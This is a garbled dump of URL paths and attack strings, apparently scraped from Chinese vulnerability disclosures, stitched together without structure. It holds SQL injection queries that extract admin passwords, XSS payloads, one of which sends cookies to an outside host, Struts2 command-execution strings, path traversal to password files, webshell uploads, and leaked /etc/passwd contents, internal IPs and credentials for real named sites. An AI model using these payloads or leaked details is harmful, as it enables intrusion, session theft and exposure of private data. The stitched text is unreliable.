x:72:72::/:/sbin/nologin x:501:501::/home/userweb:/bin/bash x:502:502::/dev/none:/sbin/nologin x:503:503::/home/nomal:/bin/bash x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:504:504::/home/bysoft:/bin/bash /read=convert.base64-encode/resource=file:///etc/passswd /index.php/adi_admin_das_online /ESCM/biddoc/publicDetailTest.do?id=1007 /robots.txt/数据流.php /Style/CatalogSubscribe.aspx?CatalogName= /Catalog/F90411/cover.html&Picture=http://img.m18.com/IMG2008/catalog/F90411.jpg /Manager/default.aspx /comment/hotcomment.htm?from=home /comment/hotcomment.htm?from=list&size=6&class=N1 /product!product.action?productId=117792&expertId=1 /gallery.php?action=step2 /ArticleImage/669c/6e31b0f6/xkdbaattomdotcom/c4ca.txt /ArticleImage/669c/6e31b0f6/xkdbaattomdotcom/c4ca.php /log/nokiaemail_20120527.log(最前面不懂了) /log/nokiaemail_20120707.log /flagpro!apple.action?productId=32929&expertId=331 /content/508 /survey/static/qiyi_logo.png/test.php /?1%3C/title%3E1%22/%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E /index/top50.htm?cid=1&dim=%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22 /product.php?id=2 /read=convert.base64-encode/resource=file:///etc/passwd /cn/index.php/pullin_china_cn/api/xmlrpc /index.php/pullin_hk_en/api/xmlrpc /etc/passwd /api/xmlrpc /etc/passwd /bbs/ /forumdata/1.txt 2.gy/ehAM /aptitude/manage / /bosh /protocol/httpbind im.wo.com.cn/woclient im.wo.com.cn/woclient xmpp:receipts /brand.html?layout=dvhddetails&hdid=161 /system/gotoLogin.action /speed/agent/task.htm /article.php?id=40075 /dianping/attraction!list.action?id=525 /index.do /soft/list/category/nodeList.php?categoryId=1401&level=2&nodeId=257/@@version /navigate/pic/soft.png/.php /ucweather/images/wea_images_b/3.gif/.php /images/baidu_mp3.gif/.php /html/1.jpg/.php /public/images/uclogo.gif/.php /Article/html/3/8/2010/28250.htm /huodong/pccc/lyricWall.action /?sa=t124v71d6397935a&vt=3 /show.php?id=10 /admin/admin_login.php 
/ty/up/2007-07-25/U1165P6T64D35127F1322DT20080124105556.txt /source/account/signin.aspx?ReturnUrl=/MS_GINS/source/home/home.aspx?pg=1 /rpa/ CNF600 welcome123 /html/doha2006/login.php sinanews /signin.asp / / / /user.htm /app/index.asp / /index/topicshow?tpid=7824 /index/topicone?tpid=9138 /sports.html /login.htm sina sinasun /login.htm sina sinasports /sports/index.htm /upload/ /sina_jb9 /sina_sports_tel_001 /sina_sports_cnc_001 /cgi-bin/sinapac.pl /gsps/ /sina_yc_ch7 /espn_ita_ch1 www.fussballdaten.de/england/2008/6/ /admin/admin_login.php /admin/yjadmin/admin_login.php espn_ita_ch1ums://60.28.175.170:7004#ums://125.64.1.9:7004 espn_ita_ch2ums://60.28.175.171:7004#ums://218.30.13.223:7004 espn_ita_ch3ums://202.108.43.152:7003#ums://218.30.115.154:7003 espn_ita_ch4ums://60.28.175.170:7005#ums://125.64.1.9:7005 espn_ita_ch5ums://60.28.175.170:7006#ums://125.64.1.9:7006 espn_ita_ch6ums://60.28.175.170:7007#ums://125.64.1.9:7007 espn_ita_ch7ums://60.28.175.170:7008#ums://125.64.1.9:7008 espn_ita_ch8ums://60.28.175.170:7009#ums://125.64.1.9:7009 livecast.sina.com.cn/InfoLive/ 124.243.201.173 wintvshare Password:12345 www.plvideo.premiumtv.co.uk/premierLeague/login.html www.plvideo.premiumtv.co.uk /espn_ita_ch1 sports.sina.com.cn/itatv/free-u-live.shtml?id=YJ04-SPRN /admin/default.aspx /aion/cat.php?id=items&w=shipin&n=xianglian /dnf/tip.php /paihang/shishi/ /paihangbang/renqibang/ db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php 
db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/aion/source/db.class.php db.07073.com/dnf/cat.class.php /e-saleCard/cardOrder!noRegistered.action /oa/chanpinpub/chanpinpub!manager.action /article/article!detail.action /post/teacher.action /frontNewInfo.action /press/excellentInit.action /proj/menuLink.action /apparatus!showApparatus.action false /webservice/sina_vote/vote_resultn.php?categ=aurevoirtaipei&set_no=234 /wzxx/search.do?key=88952634&keyID=1 /wzxx/search.do?key=88952634&keyID=1 /wzxx/search.do?key=88952634&keyID=1 /wzxx/search.do?key=88952634&keyID=1 /LoginAction/userLogin.do /soufun_forum/post/frm_post_modify.aspx none /rss.php?rtype=../../../../../etc/passwd%00 x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:81:81:System /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:34:34:Network /var/crash:/bin/bash x:28:28:NSCD /:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:66:65:tog-pegasus /var/lib/Pegasus:/sbin/nologin x:100:101:IIIMF /usr/lib64/im:/sbin/nologin x:48:48::/data/app:/bin/bash 
x:512:512::/home/mysql:/bin/bash x:38:38::/etc/ntp:/sbin/nologin x:518:519::/data/app/Oscar:/bin/bash vote_www:x:519:520::/data/app/vote.www.iciba.com:/bin/bash x:101:102:nagios:/var/log/nagios:/bin/sh x:520:521::/data/app/192.168.0.14/news.iciba.com/:/sbin/nologin x:525:48::/data/app/wap.iciba.com/wwwroot:/bin/bash ciba_duanjing:x:522:48::/data/app/wap.iciba.com/wwwroot:/sbin/nologin x:528:48::/data/apps/wap.iciba.com/iciba_wap/ef_survey:/sbin/nologin x:530:530::/home/cibayw:/bin/bash x:533:533::/data/app/wap.iciba.com/:/sbin/nologin x:535:535::/home/jinqifa:/bin/bash x:536:536::/opt/kingsoft/sbin/data/baknsliciba:/bin/bash x:537:537::/data/app/192.168.0.14/news.iciba.com/test:/bin/bash x:538:538::/data/app/sl.iciba.com/wwwroot/:/bin/bash x:539:539::/home/xueni:/bin/bash sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php sl.iciba.com/nphp/rss.php xsd="http://www.w3.org/2001/XMLSchema xsi="http://www.w3.org/2001/XMLSchema-instance trackback="http://madskills.com/public/xml/rss/module/trackback/ wfw="http://wellformedweb.org/CommentAPI/ dc="http://purl.org/dc/elements/1.1/ /admin/index.php?mod=login&act=ajaxlogin&username='or''=''or''='&pwd='or''=''or''= /admin/index.php /esysadmin/bsf/index.action /esysadmin/eweb/ /admin dict.iciba.com/lib/Ciba.class.php /admin/ /admin/include/left.jsp /Investment/info/loadallInfoDataList.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /Investment/code.jsp?c="test%20by%20wooyun /jxwfkjlweb/doAnnouncement.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /jxwfkjlweb/code.jsp?c="shell /jxwfkjlweb/shell.jsp /phpcms/index.php?m=search&a=public_get_suggest_keyword&url=http://localhost/&q=1 /phpcms/index.php?m=attachment&a=album_dir&dir=.\.\ /index.php?m=../model&c=member_group_model.class v9.demo.phpcms.cn/phpcms/libs/classes/application.class.php 
/index.php?m=../../ v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php:15 v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php post get 5px 15px;line-height:20px uri,导致click /zone/zone.action / /并且登录 /swf/FileUploader.swf然后应用 / /android/user/favdetail.jsp /research/view/concept.action / /edit/crm_filepreview.aspx?fileid=xxx&flg=1 / / www.chinaedu.com www.chinaedu.com /users!initLogin.action /newscenter/calendar/calendar_2005.html /)的高德中彩OA管理中心登录页面(http://oa.happypool.net/index.html)存在SQL注入漏洞,不仅可以使用万能密码('or'a'='a)登录,还可以获得数据库中数据。 /api/upload/index.php?action=list_image&objid=image_api_thumb&dir=/../../../ /rp?wd=914084284&tn=rp_tieba_image&staticpage=javascript:alert%28/test/%29;// /rp?wd=914084284&tn=rp_tieba_image&staticpage=http://www.wooyun.org http://localhost/phpcms/yp/business/?file=../../xxoo.txt%00 /phpcms/yp/business/?file=../../admin/upload&C[upload_allowext]=php|Php%00.|php%00&dosubmit=yes http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template= /csc/bangzhu.nsf/frmBangZhu /index.php?act=usercenter.messageinfo&messageid={id}%20and%20exists%28select%20password%20from%20system_user%29%23 /admin/index.php?act=login /admin/style/js/fckeditor/editor/filemanager/connectors/test.html /mailbox.do?method=view&id=1&mbType=0&type=2 /mailbox.do?method=view&id=2&mbType=0&type=2 /mailbox.do?method=view&id=3&mbType=0&type=2 /mailbox.do?method=view&id=4&mbType=0&type=2 /mailbox.do?method=view&id=5&mbType=0&type=2 break-all /jumpSerach.do?method=sendMailBox&idtagNo= /jumpSerach.do?method=sendMailBox&idtagNo=90449 /{Path}/wp-includes/registration-functions.php /jf/user/loginout.action存在Struts2远程命令执行漏洞 /forum.php?mod=image&aid=753&size=300x300&key=251d4107522ed3ab0b842ef9f69b2cf0&nocache=yes&type=fixnone /forum.php?mod=image&aid=1242959&size=300x300&key=d2c01bb59f1d3c17601494cc0689c962&nocache=yes&type=fixnone /powerword/images/m2.jpg%00.php /images/li38ngvkpvjxk.jpg/1.php /robots.txt 
/2012/pages/kingsoft/jobs.asp?did=300911000017 /wssb/index/xkws.action /docrec?title=%E5%8D%8E%E4%B8%BAC8812%E5%88%B7%E6%9C%BA%E6%95%99%E7%A8%8B&doc_id=ad1f9c82b9d528ea81c7795f&pu=sl@1,pw@4500,sz@1320_2001,pd@1,fz@3,lp@0,tpl@iphone page-notice.html www.top100.cn www.samsung.ccgslb.com.cn /content/395 /LDJAPP//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ http://www.bjld.gov.cn/LDJAPP/UserFiles/Image/shell.jsp odbc:ldj","sa","cns jtds:sqlserver://192.168.1.37:1433/middledata /LDJAPP/tools/crm.jsp /cardbiz /LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/web.xml&src=web.xml /content/395写了当时的测试过程,但是这个还是 /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../../lybbs/ /lybbs/shellnew.jsp /lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/web.xml /lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../netweb/detail/ /lemis/netweb/detail/shellnew.jsp /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ //FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ / /mf360/admin/index.aspx 
/cmnt/list.php?product=article&index=d795031t184v108&vt=4 /?sa=d795031t184v108&vt=4 /ivod/i/home/Play.aspx?vid=XNDI0MjM1NTgw&cid=98 /cgi-bin/act/a20100812icon/hide_icon.cgi?rid=0.09644990139701243&cmd=1&area=229&role=64457769666840392 /view/65604a8ad0d233d4b14e69f3?&st=3&pu=pw@4500lp,tpl@ /MCreditJx/cstper/reg/next.aspx /MCreditJx/ajaxpro/ApproveWeb_scMain_next,App_Web_am-0jttv.ashx /MCreditJx/cstper/reg/next.aspx 14.209.148.21* flash.178.com php?id= /xiaoyouxi/questionGame_admin/question.detail.php?id=72 /,输入网址http://3g.qq.com /g/s?sid=XXXXXXXXXXXXX&aid=home_self&g_f=9334 /g/profile/others_profile.jsp?from=visit&sid=XXXXXXXXXXXXX&u=目标用户QQ号&guest=true&g_ut=1 /antiad/report!reportList.action /notebook/my_jsb.php?showType=item&p=1&tim=1342313941&sort=2%20and%201=2%20union%20select%201,2,user%28%29,version%28%29,5,database%28%29,7,8-- /pay/payagreement.action /reg_check/check_user_login_v2.php?user_name=XXXX&user_passwd=XXXX /nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg /man/ /Shopping/OrderInfo.aspx?sid=94a21bae-3720-4c0c-95f5-27c8634d0034#topform /feedback/qlist.php?id=1那个列表中删除,不过从http://support.iciba.com/feedback/qdetail.php?id=Select_a_ID&from=qlist访问还是在的 /feedback/qdetail.php?id=18405&from=qlist /feedback/admin/question_list.php?do=del&pid=8&delid=Select_a_ID把Select_a_ID换成要删除的提问的ID,然后访问,会发现那个问题就从http://support.iciba.com/feedback/qlist.php?id=1中消失了 /htm_en/videorss_prd/.svn /feedback/admin/index.php /contacts/37009121/full?_dc=1342331522472&syncTag=0&limit=500 /mi/mi.php?mid="+mid+"&data="+data,{mid:mid,data:data /mi/mi.js /see/see_one.htm /User/MobileSearch.aspx /playerDetail.php?serverName=电信五&playerName=嘴子哥 /user/my_dictionary.php /news_view.php?typeName=%CD%BC%C6%AC%D0%C2%CE%C5&typeid=2 /member/my.php /card_select.action /22.jsp /yummi_beta/.ssh/authorized_keys /hr/zhaopin_list.aspx?flag=0&jobarea=1 /jxsj/girlchoice/index.php?act=detail&id=2601%27 
/jxsj/girlchoice/index.php?act=detail&id=2601%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2%23 /jx3/updatepage/index.php?act=search&version=33333%27%20or%201=1%23 /interface/output.php?pid=3%20and%201=1--&uid=40522&page=1&items=10&format=comment_output&nu= /external/videov2.php?vid=1948%20and%201=1 /external/videov2.php?vid=1948%20and%201=2%20union%20select%201,2,3,4-- /feedback/admin_login.php /feedback/admin_login.php?act=login /order/order.action /soft/3116.html /feedback/qlist.php?id=1 /feedback/admin/question_list.php?do=del&pid=8&delid=Select_a_ID /wanglei_0216/voteshow_radio.php?tid= /wanglei_0216/voteshow_radio.php?tid=5 www.ip66.com /bencandy.php?id=44 /brand/shoufei/ /ispis/login/login.action /TTOP/sale/ticketOrderDetail_showOrder.action?orderId=8000000 /TTOP/sale/ticketOrderDetail_showOrder.action?orderId=8000001 / /ELSNetAccept/chose/showConsider_chose.action /event/img/07165.jpg/xxxxxxx1.php /pass/forgetPassword /home/nplus/submit/nav /" /","wooyun www.baidu.com的某Flash /content/368 /baidurookit.php /baidurookit.php.txt /baidurookit.php /baidurookit.js /",true /home/nplus/submit/nav",true %2F%2Fqzone.qq.com%2F%26quot /ajax/ajax_browsers.asp /u/1348319 /irun/index.php support.qq.com/login.shtml?fid=688&url=http://data.euro2012.qq.com/eurocupTencent/eurocup/euroLive.action?mid%3D%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%25%33%44%22替收信地址(填写asp收信地址,如:http://www.x.com/1.asp / /tologin.action /offShow.action?userId=475 law.people.com.cn/n_s.action /newsView.php?sid=&cnid=1503477&chid=1_11&coid=1_11_3_1&wv=2&v=l&return=channel&fromid=&uc_param_str=dnup /newsView.php?sid=&chid=1_11&coid=1_11_3_1&wv=2&v=l&return=channel&fromid=&uc_param_str=dnup&cnid=1503477 /index.php?action=content&coid=7_3_1&chid=7_3&nid=1021853'&wv=2&cp=1&sid=&fromid= /blogview.php?cid=0&ucid=0&bid=103597&wv=1.2&v=s&iv=zh&sid=&fromid= /tip.php?id=677455&fromid=&wv=2&uc_param_str=dnup 
/tip.php?id=677452&fromid=&wv=2 /xizangpic/big.php?id=111 /include/ /include/ /include/ /admin/login.php /irun/irungame/list.php?imageField4=&name=1&city=1 /transfer/website/ /transfer/website/systemIntroduce.action / /buyingcenter/buyingweb/showBusinessInfoOnWebAction.action / /doindex!index.action /ArticleRcd.aspx?idx=54 /admin/config/main.jsp /admin/config /admin/db.jsp /admin/config/main.jsp /admin/main.jsp /admin/config/main.jsp /admin/main.jsp /template.php?action=stat&id=554 /template.php?action=stat&id=554 /source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456 /updateGoodsinfo.php?gid=51730 / /maq/class/ /maq/upload.php /wwwroot.rar / x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:25:25:Named:/var/named:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:68:68:HAL /:/sbin/nologin 
x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin x:500:500::/home/bea:/bin/bash x:501:4::/home/itnmagt:/bin/bash doone_query:x:502:500::/home/doone_query:/bin/bash www.wodota.com/test.txt的一次检测 /admin.php?mod=phpcms&file=filemanager&action=down&fname=C%3A%2php%2php.ini&dir=./php/ /search/?key=%22+onmouseover='alert(/xss+by+i@tmxk.org/)'%3E /profile/Myarchives.php?save=ok write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62)) /myproduct/boughtlist.php 2.gy/ehAM /wishlist/cust_wish_list_more.php?wish_searchkey=%22%3E%3Cscript/src=//2.gy/ehAM%3E /index.php/module/action/param1/$%7B@phpinfo()%7D /Index/download_file_myxq/id/1155 /avent/avent_task_detail.php?id=6 /ucenter/topicinfo.php?tid=1300 /IOC/client/hall!index.action /taojin/dbconnect-taojin.php /gongwuyuan/zhiwei2010/detail.php?id=1 /web/login.html /admin /admin/view/machines/query.php会显示空白。 /admin/view/machines/query.php /admin/machines/query后奇迹出现了(去掉了view、以及php后缀名),各种游戏的服务器啊。 /admin/view/shell/index.php改为 /admin/shell /gongjiaowaibao/usertype.php /gongjiaowaibao/usertype.php /virtualhall/index.jsp /virtualhall/instance/searchinfo.jsp?flownum=%27||chr%2839%29||%27 /virtualhall/instance/searchinfo.jsp?flownum='||-1 /virtualhall/instance/searchinfo.jsp?flownum='||-1 /zjzt/queryList.php?zjztType=fuask&answerType=1 /zjzt/queryList.php?zjztType=fuask&answerType=1 61.135.153.184 /tv/tvadd2.php /home.php/Index/getmodle/factoryid/$%7B@eval%28$_POST[f]%29%7D / / /jsp/admin/UserAdd.jsp /jsp/admin/login.jsp /php/artcomment.php?artid=325577 /taoli/resource/addAdminUser.jsp /jdr/loginIndex.action /torrent/6442887 /torrent/7190651/ /torrent/7238404/ /57UN btih:4d93c83f807d8b88a4ba4108730caf3e7d6209fb /external/video.php?vid=517%20and%201=2%20union%20select%201,2,3%23 /xinxi/shownews.asp?id=(-575)UNION 
/xinxi/shownews.asp?id=(-575)UNION /mobileact/ma/index.do /register!forwardRegister.action /test/ /test/LoginWin.asp /test/admin/news/dynNewsShow.asp?id=4265 /test//admin.rar /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder= /caa/gb_news.php?id=1149&modid=01002 /forum/showone.html?ftype=1&id=2450 /mall/product.html?id=34 / /admin2/ /Zcfg.asp?ID=1 /admin/ /useradmin/topicsset/topicvideo.php?topicid=5475697 /licence/view_detail.jsp?id=00485537 /lottery/projectview.action?orderId=82211547357412686184 /zWirM7P,进入后如图 /NewsList.action /youmanage/manage/editcontract.php?page=&id=92 /youmanage/manage/ws_login.php /youmanage/manage/editcontract.php?id=207&page= /?c=resource /queue/serv_query_sdr.php?ver=1.0.0.1&sid=&t1=20120709&t2=20120710 / / / / /web-console/ServerInfo.jsp /web-console/ServerInfo.jsp /xinxi/shownews.asp?id=(-575) /xinxi/shownews.asp?id=%28-575%29%20%20or%281%29=%281%29 /xinxi/shownews.asp?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17&id=%2818%29from%28admin%29%29 www.safewaf.com也没有拦截 /oauth/request_token?org=sina&r=0.6129346313048337 /oauth/authorize /oauth/callback?appId=6&t1=1342784870957&org=sina&t2=1342784871023&ts=2aa30bf70a10cf47af75d4e8b4ac7a1c"/ /2012/ /post/info/ /product/webgame/ /post/ /Review/ReviewList.asp?NewId=1 /models/poppy/poppy_client.php /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /relationship/bulkfollow.php?language=zh_cn&uids=2802303401 alpha(opacity=0) absolute 0px 0px 100% 500px center 140px 105px;height:27px absolute 0px;left:0px /page/login/login.action /page/script/dbtools.jsp /script/dbtools.jsp name="android.permission.DISABLE_KEYGUARD"/ /developer/cn/newsshow.php?id=314 /thread-4229174-1-1.html /logtoken.php#1.jpg /index.php?appid=2&goto=http://bbs.xiaomi.cn/thread-4229174-1-1.html /thread-4229174-1-1.html?token=WVK%2B*************************************** /token.txt 
/extra.php?mod=xiaomi/authcallback&token=WVK%2B***************************************登录了 /commonCall.asp?action=showindex&id=17402 /loginmgmt/index.action /wxcs_act/indexBlessing.action /?do=display&mod=goods&id=10839 /admin/login.php /?do=display&id=3653&mod=../../../../../../../../../../etc/passwd%00.jpg /info.php /index.php?gid=312446 /index.php?gid=312446 /login.php /register.php /manage_user.php?action=edituser&managerid=test123&type=test123 /manage_user.php?action=edituser&managerid=admin /adminlogin.php?logout=true /login.asp /member/newapplication.asp /list.aspx?ctypeCode=0411 /list.aspx?ctypeCode=0411 / / /99/index.php /home.htm /soft/30850.htm /存在存储型xss,和浏览器结合危害比较大。 tmxk.org/m/c?="+document.cookie;alert /?m=show&id=33481 /?m=show&id=33482 /downloadfun.jsp?filename=downloadfun.jsp /twsearch/twSearch?key=asd& /twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollow.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E /twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollowajax.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E /pQfAP cc.i.sohu.com/a/app/counts/get.htm?ids=blog_228544023,blog_228108828,blog_228098977,blog_228095558,blog_228058235,blog_228052163,blog_227994519,blog_228005565,blog_227980500,blog_227859528,blog_227858958,blog_227825831,blog_227834137,blog_227818274,blog_227815969,blog_227813242,blog_227780666,blog_227776940,blog_227758059,blog_227757241&callback= stat.i.sohu.com/guest/frag/recents.do?callback= /ques/Index/questionnaire?qid=1 admin/gg1/list.asp admin/gg1/ /helpinfo/faq/wenti.asp?id=2166 /wuhan/ /xinxi/shownews.asp?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29 
/xinxi/shownews.asp?id=%28-575%29UNION%20%28SEL%E%CT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29 com.netease.pris/databases/pris.db /student.asp?id=559 /student.asp?id=559%20and%20%28select%20char%2844%29%2b%20name%20from%20master..sysdatabases%20for%20xml%20path%29%3E0 /student.asp?id=-559%20union%20select%201,db_name%28%29,3,4,5,6,7,%28select%20%20char%2844%29%2bname%20from%20[sysobjects]%20where%20xtype=0x75%20for%20xml%20path%29%20,9,null /students.html /op/search.shtml?Type=ns&keyword=%27%3Cscript%3Ealert%281%29%3C/script%3E /SFMobile.xml com.netease.book/shared_prefs/com.netease.book_preferences.xml com.youdao.cube/shared_prefs/com.youdao.cube_preferences.xml com.netease.wb/databases/weibo.db com.netease.ca/shared_prefs/config.xml /index.action system_r:java_t:SystemLow-SystemHigh /gameAction!getSingleGame.action /newzhibo.php?showid=611 /cystars/fansclass/pic_list.php?active_type=2&cyid=2006849514 /album.php?action=show&aid=21441 /vote/vote_bicarsa.php?voteid=1534 /newzhibo.php?showid=611 /article.php?id=315425 gov.cn E_Type.asp?TypeId=7 /emall/SNNetStoreView?storeId=11554&catalogId=10654&langId=-7&from=index&storeType=0&storeName=&reqProvince=&reqCity= /emall/SNNetStoreInfoView?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/-- /emall/SNNetStoreInfoView?cityId1=9137&storeName=*/from%20syscat.schemata%20fetch%20first%201%20rows%20only%29,1,1%29%29%3E10--&dist1=aa%27or%20ascii%28SUBSTR%28%28select%20schemaname/* /cn/shopping.asp?cid=5 /jobs/jobs-list.php?aid=14 SELECT /shopadmin/index.php#ctl=system/tmpimage&act=index&theme= /shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../ /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /newscont.php?id=92 /admin/ /fckeditor/editor/filemanager/upload/php/upload.php?Type=Media /fckeditor/editor/filemanager/upload/test.html /attachments/files /taivid_admin/"发现好多默认的网站后台; 
www.taivid.cn、www.taivid.com,发现cn是主站全静态页面,com站加taivid_admin出现登陆后台,admin、admin登陆后台,后台可直接写入一句话,哎。。。。。 / /nexus/index.html,匿名用户有系统管理权,导致敏感信息泄漏,包括一些源码。 /bamboo /phpinfo.php /vote/vote.php?ud_id=71 /zt/2012/0507/content.php?id=1144 /phpmyadmin/ /Search.aspx?cid=2 /user/FClass.php?type=1 www.upyun.com 12.0 /setting.php /xss.js /index.php?c=main&a=content&id=336411ddddddddddddddddd&tag=info&page=0 look.php 1.xx.com/gq_date.dat 2.xx.com/db.dat /voteservice/admin/pid_list.php /crcc/rzxx-hzqy-detail.asp?id=355 /news_list.php?type=news /news_detail.asp?id=20100128 /data/sContent.rar /99/index.php?case=archive&act=search /99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=searchhttp://demo.cmseasy.cn/99/index.php?case=archive&act=search /agreement.html 